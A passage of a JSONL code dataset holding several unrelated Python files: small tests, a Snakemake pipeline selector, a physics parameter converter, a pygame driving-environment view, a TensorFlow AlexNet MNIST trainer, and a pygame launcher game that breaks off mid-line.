print ('fizzbuzz')\n elif i%3 == 0:\n print('fizz')\n elif i%5 == 0:\n print('buzz')\n else: print(i)\n\nfizz_buzz(20)","sub_path":"fizz_buzz.py","file_name":"fizz_buzz.py","file_ext":"py","file_size_in_byte":225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"553882595","text":"''' This scripts tests reading a path planning .pth file.\n'''\nimport os\nfrom pathlib import Path\nimport sv\nimport sys\nimport vtk\n\n## Set some directory paths. \nscript_path = Path(os.path.realpath(__file__)).parent\nparent_path = Path(os.path.realpath(__file__)).parent.parent\ndata_path = parent_path / 'data'\n\ntry:\n sys.path.insert(1, str(parent_path / 'graphics'))\n import graphics as gr\nexcept:\n print(\"Can't find the new-api-tests/graphics package.\")\n\n## Create a Paths object from an SV file.\n#\nhome = str(Path.home())\npath_name = \"aorta\"\nfile_name = str(data_path / 'DemoProject' / 'Paths' / (path_name + \".pth\"))\npaths = sv.pathplanning.Series(file_name)\nprint(\"Paths:\")\nprint(\" Number of time steps: {0:d}\".format(paths.get_num_times()))\nprint(\" Name: {0:s}\".format(paths.get_name()))\n\nprint(\" \")\nprint(\"Path at time 0:\")\naorta_path = paths.get_path(0)\ncontrol_points = aorta_path.get_control_points()\nprint(\" Number of control points: {0:d}\".format(len(control_points)))\ncurve_points = aorta_path.get_curve_points()\nprint(\" Number of curve points: {0:d}\".format(len(curve_points)))\n#\npoint = aorta_path.get_curve_point(20)\nprint(\" Point 20: {0:s}\".format(str(point)))\ntangent = aorta_path.get_curve_tangent(20)\nprint(\" Tangent 20: {0:s}\".format(str(tangent)))\nnormal = aorta_path.get_curve_normal(20)\nprint(\" Normal 20: {0:s}\".format(str(normal)))\n#\nnum_subdiv = aorta_path.get_num_subdivisions()\nprint(\" Number of subdivisions: {0:d}\".format(num_subdiv))\nsubdiv_method = aorta_path.get_subdivision_method()\nprint(\" Subdivision method: {0:s}\".format(subdiv_method))\n\n## Create 
renderer and graphics window.\nwin_width = 500\nwin_height = 500\nrenderer, renderer_window = gr.init_graphics(win_width, win_height)\n\n# Create path geometry.\ngr.create_path_geometry(renderer, aorta_path)\n#gr.create_path_geometry(renderer, aorta_path, show_points=True)\n\n# Display window.\ngr.display(renderer_window)\n\n\n","sub_path":"new-api-tests/pathplanning/read-paths-file.py","file_name":"read-paths-file.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"44976435","text":"# Copyright (c) 2016 Uber Technologies, Inc.\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom __future__ import (\n absolute_import, division, print_function, unicode_literals\n)\n\nimport pytest\nfrom tchannel import thrift as tch_thrift\n\nfrom yarpc import Request, Response\nfrom yarpc.encoding import thrift\n\n# TODO add all the test cases from tchannel/schemes/test_thrift.py\n\nidl = 'tests/data/idls/ThriftTest.thrift'\n\n\n@pytest.fixture\ndef service():\n return thrift.load(idl)\n\n\n@pytest.fixture(autouse=True)\ndef testString(rpc, service):\n\n @thrift.procedure(service.ThriftTest)\n def testString(request):\n assert request.service == 'test-service'\n assert request.encoding == 'thrift'\n assert request.procedure == 'ThriftTest::testString'\n assert request.body.thing == 'howdy'\n return Response(\n body=request.body.thing,\n headers=request.headers,\n )\n\n rpc.register(testString)\n return testString\n\n\n@pytest.fixture\ndef client(rpc):\n return thrift.ThriftClient(rpc.channel('test-service'))\n\n\n@pytest.mark.gen_test\ndef test_should_call_procedure(client, service):\n req = Request(\n body=service.ThriftTest.testString('howdy'),\n ttl=10000,\n )\n\n resp = yield client.call(req)\n assert isinstance(resp, Response)\n assert resp.body == 'howdy'\n\n\n@pytest.mark.gen_test\ndef test_can_call_handler(testString, service):\n req = Request(\n service='test-service',\n encoding='thrift',\n procedure='ThriftTest::testString',\n body=service.ThriftTest.testString('howdy'),\n ttl=10000,\n )\n\n resp = testString(req)\n assert isinstance(resp, Response)\n assert resp.body == 'howdy'\n\n\n@pytest.mark.xfail\n@pytest.mark.gen_test\ndef test_should_call_procedure_with_kwargs(client, service):\n resp = yield client.call(\n body=service.ThriftTest.testString('howdy'),\n 
ttl=10000,\n )\n assert isinstance(resp, Response)\n assert resp.body == 'howdy'\n\n\n@pytest.mark.gen_test\ndef test_should_roundtrip_headers(client, service):\n headers = {\n 'hello': 'world',\n 'mynameis': 'bob',\n }\n req = Request(\n body=service.ThriftTest.testString('howdy'),\n headers=headers,\n ttl=10000,\n )\n resp = yield client.call(req)\n assert headers == resp.headers\n\n\n##############################################################################\n# TODO: The following tests just assert things about the load() function. We\n# should move them to a separate file once we break yarpc.encoding.thrift into\n# submodules.\n\n\ndef test_service_methods_should_return_body(service):\n body = service.ThriftTest.testString(thing='hi')\n assert body.thing == 'hi'\n\n\ndef test_types_should_be_attached(service):\n bonk = service.Bonk(\n message='hi',\n type=100,\n )\n assert bonk.to_primitive() == {\n 'message': 'hi',\n 'type': 100,\n }\n\n\ndef test_constants_should_be_attached(service):\n assert service.myNumberz == 1\n\n\ndef test_req_body_is_wire_compat_with_tchannel(service):\n args = {\n 'string_thing': 'hi',\n 'byte_thing': 1,\n 'i32_thing': -1,\n 'i64_thing': -34359738368,\n }\n\n # serialize object using yarpc's thrift.load\n xtruct = service.Xtruct(**args)\n req_body = service.ThriftTest.testStruct(xtruct)\n wire = req_body.__thrift_module__.dumps(req_body) # non-enveloped\n\n # now serialize using tchannel's thrift.load\n tch_service = tch_thrift.load(idl, service='...', hostport='...')\n tch_xtruct = tch_service.Xtruct(**args)\n tch_req_body = tch_service.ThriftTest.testStruct(tch_xtruct)\n tch_serializer = tch_req_body.get_serializer()\n tch_wire = tch_serializer.serialize_body(tch_req_body.call_args)\n\n assert wire == tch_wire\n","sub_path":"tests/yarpc/encoding/test_thrift.py","file_name":"test_thrift.py","file_ext":"py","file_size_in_byte":4812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"41126569","text":"\nimport yaml\nimport sys\n\"\"\"\nEric Fournier 2019-06-17\nRetourne le SnakeMake pipeline a executer selon la colonne Pipeline du SampleSheet.csv\n\"\"\"\n\n#Le fichier mapping yaml pour la correspondance entre le pipeline indique dans la colonne Pipeline du SampleSheet et le nom pipeline a executer\nsnakemake_param = sys.argv[1]\n\n#Le sample sheet simplifie de la run\nsample_sheet = sys.argv[2]\n\nsample_sheet_handle = open(sample_sheet)\nheader = sample_sheet_handle.readline()\n#le nom du pipeline dans le sample sheet\npipeline_from_samplesheet = sample_sheet_handle.readline().split(',')[10]\nsample_sheet_handle.close()\n\nsnakemake_param_handle = open(snakemake_param)\nsnakemake_pipeline_map_dict = yaml.load(snakemake_param_handle)\n#print snakemake_pipeline_map_dict\n#le nom du pipeline a executer\npipeline = snakemake_pipeline_map_dict[pipeline_from_samplesheet]\nsnakemake_param_handle.close()\n\nexit(pipeline)\n","sub_path":"GetSnakeMakePipeline.py","file_name":"GetSnakeMakePipeline.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"90782725","text":"import numpy as np\nfrom scipy.optimize import newton\n\nclass SimulToAnalytic:\n def __init__(self,k=1,kA=0,kc=0.001,J=0,epsilon=0.001,writting=True,ParticleType='Triangle'):\n self.k,self.kA,self.kc,self.J,self.epsilon,self.ParticleType = k,kA,kc,J,epsilon,ParticleType #store the constant\n self.nu=(np.sqrt(3)*self.k+2*self.kA)/(3*np.sqrt(3)*self.k+2*self.kA) # Poisson's ratop\n if ParticleType=='Triangle':\n self.l0 = 1+self.epsilon\n self.la=np.sqrt(3)/2*self.k+self.kA # lambda lame coef\n self.mu=np.sqrt(3)/2*self.k # mu lame coef\n self.kcouplingc=self.kc/self.l0**2*4*np.sqrt(3) # coupling parameter\n elif ParticleType=='Hexagon':\n self.la = np.sqrt(3)/4*k+0.5*kA\n self.mu = np.sqrt(3)/4*k\n self.l0 =1.\n self.kcouplingc = np.sqrt(3)*kc/(1-epsilon**2)\n 
self.LMu=self.la+2*self.mu # lambda+2mu\n self.l=np.sqrt((self.la+2*self.mu)/(2*self.kcouplingc)) # depth length\n self.fb=0.5*(self.LMu)*(1+self.nu)*(2*self.epsilon/(1+self.epsilon))**2 # bulk free energy per area\n if self.ParticleType == 'Triangle':\n self.FB=self.fb*np.sqrt(3)/4 * (1+self.epsilon)**2#Bulk free energy per particle\n self.Gamma=2*self.J/(self.l*self.l0*self.fb*(1+self.nu)) # rescaled surface tension\n elif self.ParticleType == 'Hexagon':\n self.FB = self.fb*np.sqrt(3)/2*(1+self.epsilon)**2\n #self.FB = self.fb * 3*np.sqrt(3)/2*(1./3.+epsilon**2)\n self.Gamma=2*self.J/(self.l*(1+self.nu)*self.fb*(1/3+epsilon**2)**0.5)\n if writting:\n print('nu='+str(self.nu))\n print('lambda='+str(self.la))\n print('mu='+str(self.mu))\n print('kcoupling_continuous='+str(self.kcouplingc))\n print('l='+str(self.l))\n print('volumique bulk free energy fb='+str(self.fb))\n print('free energy per particle FB='+str(self.FB))\n print('Gamma='+str(self.Gamma))\n print('ParticleType = '+str(self.ParticleType))\n def Range(self,Nmax):\n if self.ParticleType == 'Triangle':\n #Size = int(4*(Nmax/6)**0.5+0.5)\n #dirty disk\n #Size = int(4*np.sqrt(Nmax/np.pi*0.433))+2\n #return np.arange(4,Size,4)\n #clean disk\n Size = self.Size(Nmax)\n return np.arange(1,Size,1)\n elif self.ParticleType == 'Hexagon':\n #Size = int(0.5* (1+np.sqrt(1+8*Nmax)))\n #return np.arange(1,Size,1)\n def NFunc(R):\n return (R/2-R**(1./3.))**2-Nmax\n Size = int(newton(NFunc,20))\n return np.arange(4,Size,2)\n def Size(self,N):\n if self.ParticleType == 'Triangle':\n #clean disk\n return 0.5 * ( (N/(3**0.5*np.pi))**0.5-1.5)\n #dirty disk\n #return max(int(4*np.sqrt(N/np.pi*0.433))+2,1)\n elif self.ParticleType== 'Hexagon' :\n def NFunc(R):\n return (R/2-R**(1./3.))**2-N\n Size = int(newton(NFunc,20))\n return max(Size,1)\n def HRange(self,Nmax):\n if self.ParticleType == 'Triangle':\n Size = int(4*(Nmax/6)**0.5+0.5)\n return np.arange(2,Size,2)\n elif self.ParticleType == 'Hexagon':\n Size = int(1./6.* 
(3+np.sqrt(3*(4*Nmax-1))))\n return np.arange(1,Size,1)\n def write(self,All=False):\n return np.arange(1,Size,1)\n def HSize(self,N):\n if self.ParticleType == 'Triangle':\n return max(int(4*(N/6)**0.5),1)\n elif self.ParticleType== 'Hexagon' :\n #return max(int(0.5* (1+np.sqrt(1+8*N))),1)\n return max(int(1./6.* (3+np.sqrt(3*(4*N-1)))),1)\nclass AnalyticToSimul:\n def __init__(self,nu=1/3,Gamma=0.,l=1.,epsilon=0.1,writting = True,ParticleType='Triangle'): #here we assumed k = 1\n self.nu,self.Gamma,self.l,self.epsilon,self.ParticleType = nu,Gamma,l,epsilon,ParticleType\n self.k = 1\n self.kA = (3*np.sqrt(3)*self.nu-np.sqrt(3))/(2*(1-self.nu))\n if ParticleType=='Triangle':\n self.l0 = 1+self.epsilon\n self.LMu = 3*np.sqrt(3)/2+self.kA\n self.kc = self.LMu/(8*np.sqrt(3)*(self.l/self.l0)**2)\n elif ParticleType=='Hexagon':\n self.LMu = 3*np.sqrt(3)/4+0.5*self.kA\n self.kc = (1-epsilon**2)*self.LMu/(2*np.sqrt(3)*self.l**2)\n self.l0 = 1.#+self.epsilon\n self.fb = 0.5*self.LMu*(1+self.nu)*(2*self.epsilon/(1+self.epsilon))**2\n if ParticleType=='Triangle':\n self.FB = self.fb*np.sqrt(3)/4 * self.l0**2#Bulk free energy per particle\n self.J = self.l*self.fb*(1+self.nu)*self.Gamma/2*self.l0\n self.Flacune = np.inf\n elif ParticleType=='Hexagon':\n #self.FB = self.fb* np.sqrt(3)*3/2*(1./3.+self.epsilon**2)\n self.FB = self.fb*np.sqrt(3)/2*(1+self.epsilon)**2\n self.J = self.Gamma*(self.l*(1+self.nu)*self.fb*(1/3+epsilon**2))/2\n self.Flacune = 3*(1/3+self.epsilon**2)*self.fb*self.l*(1+self.nu)/2*self.Gamma\n if writting :\n print('k='+str(self.k))\n print('kA='+str(self.kA))\n print('kc='+str(self.kc))\n print('J='+str(self.J))\n print('fb='+str(self.fb))\n print('ParticleType = '+str(self.ParticleType))\n def Range(self,Nmax):\n if self.ParticleType == 'Triangle':\n #Size = int(4*(Nmax/6)**0.5+0.5)\n #dirty disk\n #Size = int(4*np.sqrt(Nmax/np.pi*0.433))+2\n #return np.arange(4,Size,4)\n #clean disk\n Size = self.Size(Nmax)\n return np.arange(1,Size,1)\n elif 
self.ParticleType == 'Hexagon':\n #Size = int(0.5* (1+np.sqrt(1+8*Nmax)))\n #return np.arange(1,Size,1)\n def NFunc(R):\n return (R/2-R**(1./3.))**2-Nmax\n Size = int(newton(NFunc,20))\n return np.arange(4,Size,2)\n def Size(self,N):\n if self.ParticleType == 'Triangle':\n #clean disk\n #print(0.5 * ( (N/(3**0.5*np.pi))**0.5-1.5))\n return max(1,int(0.5 * ( (N/(3**0.5*np.pi))**0.5-1.5)+0.5))\n #dirty disk\n #return max(int(4*np.sqrt(N/np.pi*0.433))+2,1)\n elif self.ParticleType== 'Hexagon' :\n def NFunc(R):\n return (R/2-R**(1./3.))**2-N\n Size = int(newton(NFunc,20))\n return max(Size,1)\n def HRange(self,Nmax):\n if self.ParticleType == 'Triangle':\n Size = int(4*(Nmax/6)**0.5+0.5)\n return np.arange(2,Size,2)\n elif self.ParticleType == 'Hexagon':\n Size = int(1./6.* (3+np.sqrt(3*(4*Nmax-1))))\n return np.arange(1,Size+1,1)\n def write(self,All=False):\n return np.arange(1,Size,1)\n def HSize(self,N):\n if self.ParticleType == 'Triangle':\n return max(int(4*(N/6)**0.5),1)\n elif self.ParticleType== 'Hexagon' :\n #return max(int(0.5* (1+np.sqrt(1+8*N))),1)\n return max(int(1./6.* (3+np.sqrt(3*(4*N-1)))),1)\n def write(self,All=False):\n print('k='+str(self.k))\n print('kA='+str(self.kA))\n print('kc='+str(self.kc))\n print('J='+str(self.J))\n print('fb='+str(self.fb))\n print('ParticleType = '+str(self.ParticleType))\n if All :\n print('epsilon='+str(self.epsilon))\n print('nu='+str(self.nu))\n print('Gamma='+str(self.Gamma))\n print('l='+str(self.l))\n","sub_path":"Conversion.py","file_name":"Conversion.py","file_ext":"py","file_size_in_byte":7610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"231321449","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport pygame\nimport numpy as np\nfrom variables import global_var\n\nRED = (255, 0, 0)\nBLUE = (0, 0, 255)\n\n\nclass View(object):\n\n \"\"\"View handles the visualization part of the environment.\"\"\"\n\n def __init__(self, env_name, env_width, 
env_height, screen_width=None, screen_height=None, flip=False):\n \"\"\"Initializes View.\n\n Args:\n env_name: The name of the environment image to load.\n env_width: The width of the whole environment.\n env_height: The height of the whole environment.\n screen_width: The width of the screen to view. If None, whole env is displayed.\n screen_height: The height of the screen to view. If None, whole env is displayed.\n flip: Whether to flip the screen. For driving view.\n \"\"\"\n self.flip = flip\n\n # Width of the whole environment.\n self.width = env_width\n self.height = env_height\n\n # Width of the view.\n self.screen_width = screen_width if screen_width is not None else env_width\n self.screen_height = screen_height if screen_height is not None else env_height\n\n # Whether the environment should follow the agent's view or show the whole env.\n self.scroll = self.width != self.screen_width or self.height != self.screen_height\n\n self.surface = None\n self.surface_flipped = None\n self.env_view = None\n\n self.trajectory = None # The trajectory to draw onto the image.\n\n self.env_img = self._load_img(env_name)\n\n self.surface = pygame.Surface((self.screen_width, self.screen_height))\n self.surface_flipped = pygame.Surface((self.screen_width, self.screen_height))\n\n def update(self, x, y, characters):\n \"\"\"Updates the view with all the characters.\n\n Args:\n x: The x coordinate around which to center the view.\n y: The y coordinate around which to center the view.\n characters: A list of tuples of form (img, x, y, theta) for each char.\n\n Returns:\n Surface object.\n \"\"\"\n # Update the current view of the environment.\n self.env_view = self._get_current_view(x, y)\n\n # Draw a trajectory if it exists.\n if self.trajectory is not None:\n self._draw_trajectory()\n\n # Draw the environment onto the image.\n self.surface.blit(self.env_img, (0, 0), self.env_view)\n\n # Draw each character on the image.\n for img, x, y, theta in characters:\n 
self._draw_character(img, x, y, theta, self.env_view[0], self.env_view[1])\n\n # Flip the image if necessary.\n if self.flip:\n self.surface_flipped = pygame.transform.flip(self.surface, False, True)\n self.surface.blit(self.surface_flipped, (0, 0))\n\n return self.surface\n\n def draw_trajectory(self, trajectory):\n \"\"\"Saves and draws trajectory which is a list of states. The states\n need to be of form (x, y). Call update to see the trajectory. TODO: Add\n theta and make arrows.\"\"\"\n self.trajectory = trajectory\n self._draw_trajectory()\n\n def clear_trajectory(self):\n \"\"\"Clears the trajectory from the view.\"\"\"\n self.trajectory = None\n\n def _draw_trajectory(self):\n \"\"\"Draws the actual trajectory onto the image.\"\"\"\n if self.trajectory is None:\n return\n\n for state in self.trajectory:\n pygame.draw.circle(self.env_img, BLUE, (int(state[0]), int(state[1])), 2)\n\n def get_colour(self, x, y):\n \"\"\"Returns the normalized RGB values of the pixel at x, y.\"\"\"\n if x >= self.width or y >= self.height:\n return (0, 0, 0)\n\n return self.env_img.get_at((int(x), int(y))).normalize()[0:3]\n\n def _load_img(self, name):\n \"\"\"Loads the image from the map directory.\"\"\"\n try:\n img_path = os.path.join(global_var.PATH, \"maps\", name + \".png\")\n env_img = pygame.image.load(img_path)\n except Exception as e:\n print(e)\n print(\"Environment\", name, \"does not exist. 
Make sure that a PNG image exists\",\n \"under that name in the \\\"maps\\\" folder.\")\n sys.exit()\n\n return env_img\n\n def _draw_character(self, img, x, y, theta, view_x=0, view_y=0):\n \"\"\"Helper function to draw a character on the screen.\n\n Args:\n img: The image of the character object.\n x: The x position of the character.\n y: The y position of the character.\n theta: The character's heading.\n view_x: The x component of the corner of the current view.\n view_y: The y component of the corner of the current view.\n \"\"\"\n # Rotate the image and get its dimensions.\n rotated = pygame.transform.rotate(img, np.degrees(theta))\n rect = rotated.get_rect()\n\n # Calculate the global position of the corner of the car within the map\n x_global = x - rect.width / 2.0\n y_global = y - rect.height / 2.0\n\n # The car should be displayed relative to the current view.\n x = x_global - view_x\n y = y_global - view_y\n\n self.surface.blit(rotated, (int(round(x)), int(round(y))))\n\n def _get_current_view(self, agent_x, agent_y):\n \"\"\"Gets the coordinates of what the current view should be so that the\n view follows the agent.\"\"\"\n # If scroll is False, the current view is always the whole image.\n if not self.scroll:\n return (0, 0, self.width, self.height)\n\n x = agent_x\n y = agent_y\n w = self.screen_width\n h = self.screen_height\n\n # This is the amount by which the current view selection overshoots the\n # actual size of the environment.\n overshoot_x = max(x + w / 2 - self.width, 0) % self.width\n overshoot_y = max(y + h / 2 - self.height, 0) % self.height\n\n # Make sure that the view will be inside the environment.\n corner_x = max(x - w / 2 - overshoot_x, 0)\n corner_y = max(y - h / 2 - overshoot_y, 0)\n\n return (int(round(corner_x)), int(round(corner_y)), w, h)\n\n\nif __name__ == '__main__':\n # Test code for drawing trajectories and moving along them.\n from agent import Agent\n\n display_surface = pygame.display.set_mode((500, 500))\n clock = 
pygame.time.Clock()\n pygame.display.set_caption('Traffic World')\n\n pygame.init()\n\n view = View(\"two_lanes\", 500, 1500, 500, 500)\n agent = Agent()\n\n trajectory = [(300, 40),\n (300, 45),\n (300, 50),\n (300, 55),\n (300, 60),\n (300, 65),\n (300, 70),\n (300, 75),\n (300, 80),\n (300, 85),\n (300, 90),\n (300, 95),\n (300, 100),\n (300, 105),\n (300, 110),\n (300, 115),\n (300, 120),\n (300, 125),\n (300, 130)]\n\n view.draw_trajectory(trajectory)\n\n for state in trajectory:\n surf = view.update(state[0], state[1], [(agent.img, state[0], state[1], 0)])\n\n display_surface.blit(surf, (0, 0))\n pygame.display.update()\n clock.tick(15)\n\n done = False\n while not done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n pygame.quit()\n","sub_path":"monicars/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":7526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"377268715","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport sys\nimport argparse\nfrom models.alexnet import model_fn as alexnet_model_fn\n\nFLAGS = None\n\ntf.logging.set_verbosity(tf.logging.INFO)\n\n\ndef main(unused_argv):\n mnist = tf.contrib.learn.datasets.load_dataset(\"mnist\")\n train_data = mnist.train.images\n train_labels = np.asarray(mnist.train.labels, dtype=np.int32)\n valid_data = mnist.validation.images\n valid_labels = np.asarray(mnist.validation.labels, dtype=np.int32)\n test_data = mnist.test.images\n test_labels = np.asarray(mnist.test.labels, dtype=np.int32)\n\n run_config = tf.estimator.RunConfig()\n # run_config = run_config.replace(save_checkpoints_steps=3000)\n\n alexnet = tf.estimator.Estimator(\n model_fn=alexnet_model_fn,\n model_dir=FLAGS.model_dir,\n params=vars(FLAGS),\n config=run_config\n )\n\n train_input_fn = 
tf.estimator.inputs.numpy_input_fn(\n x={'x': train_data},\n y=train_labels,\n batch_size=FLAGS.batch_size,\n num_epochs=None,\n shuffle=True,\n num_threads=8\n )\n\n valid_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'x': valid_data},\n y=valid_labels,\n num_epochs=1,\n shuffle=False\n )\n\n valid_n_steps = FLAGS.valid_n_steps\n iter_count = 1\n if valid_n_steps > 0:\n iter_count = FLAGS.max_steps / valid_n_steps\n else:\n valid_n_steps = FLAGS.max_steps\n\n for count in range(int(iter_count)):\n alexnet.train(\n input_fn=train_input_fn,\n max_steps=(count+1) * valid_n_steps\n )\n\n eval_valid_result = alexnet.evaluate(input_fn=valid_input_fn, name='validation')\n print('valid eval result: ', eval_valid_result)\n\n test_input_fn = tf.estimator.inputs.numpy_input_fn(\n x={'x': test_data},\n y=test_labels,\n num_epochs=1,\n shuffle=False\n )\n\n eval_test_result = alexnet.evaluate(input_fn=test_input_fn, name='test')\n print('test eval result: ', eval_test_result)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--learning_rate',\n type=float,\n default=1e-4,\n help='Initial learning rate.'\n )\n parser.add_argument(\n '--decay_steps',\n type=int,\n default=1000,\n help='Number of steps to run trainer.'\n )\n parser.add_argument(\n '--decay_rate',\n type=int,\n default=0.8,\n help='Number of steps to run trainer.'\n )\n parser.add_argument(\n '--lr_boundaries',\n type=list,\n default=[1000, 3000, 5000, 7000, 9000, 11000, 13000, 15000, 18000],\n help='Learning rate boundaries'\n )\n parser.add_argument(\n '--lr_values',\n type=list,\n default=[1e-3, 1e-4, 1e-5, 1e-6, 1e-7, 1e-8, 1e-9, 1e-10, 1e-11],\n help='learning rate values'\n )\n parser.add_argument(\n '--keep_prob',\n type=float,\n default=0.5,\n help='Dropout keep prob.'\n )\n parser.add_argument(\n '--max_steps',\n type=int,\n default=5000,\n help='Number of steps to run trainer.'\n )\n parser.add_argument(\n '--steps',\n type=int,\n default=None,\n 
help='Number of steps to run trainer.'\n )\n parser.add_argument(\n '--valid_n_steps',\n type=int,\n default=2000,\n help='Number of steps to run trainer.'\n )\n parser.add_argument(\n '--batch_size',\n type=int,\n default=128,\n help='Batch size. Must divide evenly into the dataset sizes.'\n )\n parser.add_argument(\n '--model_dir',\n type=str,\n default='/data/private/models/lr_1e-4',\n help='Directory to put the model data.'\n )\n\n FLAGS, unparsed = parser.parse_known_args()\n tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)","sub_path":"dave/kakaobrain/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"285890626","text":"import pygame, sys\nimport math\nimport random\n\ndef ball_animation():\n global ball_speed_x, ball_speed_y, ball_angle, lives, i, Background_game, player_x, background\n screen.fill(bg_color)\n screen.blit(background_game, (0,0))\n screen.blit(target, (screen_width * i/48, screen_height * 36/40))\n screen.blit(astronaut, (screen_width * 4/6, screen_height / 60 *39))\n target_rect = pygame.Rect(screen_width * i/48, screen_height * 69/72, target.get_width(), 2)\n pygame.draw.ellipse(screen, (0,200,200), ball)\n pygame.draw.rect(screen, (0,0,0), line)\n launcher_copy = pygame.transform.rotate(launcher, -1 * ball_angle)\n screen.blit(launcher_copy, (screen_width / 120 * 27 - int(launcher_copy.get_width() / 4), screen_height / 120 * 95 - int(launcher_copy.get_height() /2)))\n text = font.render(\"Angle \" + \"{:.2f}\".format(-1 * ball_angle), 30, (200,0,0))\n text1 = font.render(\"Velocity \" + \"{:.2f}\".format(ball_velocity), 30, (200,0,0))\n textlives = font.render(\"Lives Left: \" + str(lives), 30, (200,0,0))\n screen.blit(textlives, (screen_width * 6/8, screen_height * 1/12))\n screen.blit(text1, (screen_width/6, screen_height/8))\n screen.blit(text, (screen_width/6, screen_height/12))\n ball.x += 
ball_speed_x\n ball.y += ball_speed_y\n\n if ball.bottom >= screen_height* 78/80:\n ball_speed_x = 0\n ball_speed_y = 0\n ball.bottom = screen_height / 80 * 64\n ball.left = screen_width / 120 * 30.4\n lives -= 1\n if ball.colliderect(line):\n ball_speed_y = 0\n if ball.colliderect(target_rect):\n ball_speed_x = 0\n ball_speed_y = 0\n while player_x < 700:\n background = pygame.image.load('ChallengeRoom1(Door1Open).jpg')\n completed()\n if ball.colliderect(wall):\n ball_speed_x = 0\n ball_speed_y = 0\n ball.bottom = screen_height / 80 * 64\n ball.left = screen_width / 120 * 30.4\n lives -= 1\n\n\n if ball.right >= screen_width + 20:\n ball_speed_x = 0\n ball_speed_y = 0\n ball.bottom = screen_height / 80 * 64\n ball.left = screen_width / 120 * 30.4\n lives -= 1\n\ndef update():\n global ball_velocity, ball_angle, lives, i\n if lives == 0:\n i = random.randrange(27, 36, 1)\n lives = 3\n if ball_velocity <= 7:\n ball_velocity = 7\n if ball_velocity > 20:\n ball_velocity = 20\n if ball_velocity <= 20:\n ball_velocity += ball_velocity_increment\n if ball_angle < -80:\n ball_angle = -80\n if ball_angle > 0:\n ball_angle = 0\n if ball_angle >= -80:\n ball_angle += ball_angle_increment\n\n\ndef completed():\n global background, player_x, walkcount\n if walkcount + 1 >= 27:\n walkcount = 0\n screen.blit(background, (0,0))\n screen.blit(launcher, (screen_width / 120 * 27 - int(launcher.get_width() / 4), screen_height / 120 * 95 - int(launcher.get_height() /2)))\n screen.blit(background, (0,0))\n screen.blit(launcher, (screen_width / 120 * 27 - int(launcher.get_width() / 4), screen_height / 120 * 95 - int(launcher.get_height() /2)))\n screen.blit(target, (screen_width * i/48, screen_height * 36/40))\n screen.blit(text_launcher, (screen_width *2 / 6, screen_height/8))\n screen.blit(astronaut, (screen_width * 4/6, screen_height / 60 *39))\n screen.blit(player_walking [walkcount//7], (player_x, player_y))\n screen.blit(door_frame, (screen_width * 46 / 100, screen_height * 66 / 
100))\n player_x += 1.5\n walkcount += 1\n pygame.display.update()\n\n\n \n\ndef player_animation():\n global walkcount, player_x, i, font, text_launcher, walking, sound1, sound2, j, speech\n screen.blit(background, (0,0))\n screen.blit(launcher, (screen_width / 120 * 27 - int(launcher.get_width() / 4), screen_height / 120 * 95 - int(launcher.get_height() /2)))\n screen.blit(target, (screen_width * i/48, screen_height * 36/40))\n screen.blit(text_launcher, (screen_width *2 / 6, screen_height/8))\n screen.blit(astronaut, (screen_width * 4/6, screen_height / 60 *39))\n if walkcount + 1 >= 27:\n walkcount = 0\n if player_x < 0:\n player_x = 0\n if walking:\n screen.blit(player_walking [walkcount//7], (player_x, player_y))\n walkcount += 1\n if walking == False:\n screen.blit(player_standing, (player_x, player_y))\n if player_x > screen_width / 100 * 41:\n player_x = screen_width / 100 * 41\n if j == 1:\n speech = speech_1\n screen.blit(speech, (screen_width * 3/8, screen_height * 3/8))\n pygame.display.flip()\n sound1.play()\n pygame.time.delay(12000)\n sound2.play()\n pygame.time.delay(14000)\n fill()\n screen.blit(speech_2, (screen_width * 3/8, screen_height * 3/8))\n pygame.display.flip()\n sound3.play()\n pygame.time.delay(3000)\n fill()\n screen.blit(speech_3, (screen_width * 3/8, screen_height * 3/8))\n pygame.display.flip()\n pygame.time.delay(3000)\n fill()\n screen.blit(speech_4, (screen_width * 3/8, screen_height * 3/8))\n pygame.display.flip()\n fill()\n pygame.time.delay(3000)\n screen.blit(speech_5, (screen_width * 3/8, screen_height * 3/8))\n pygame.display.flip()\n pygame.time.delay(3800)\n fill()\n screen.blit(speech_6, (screen_width * 3/8, 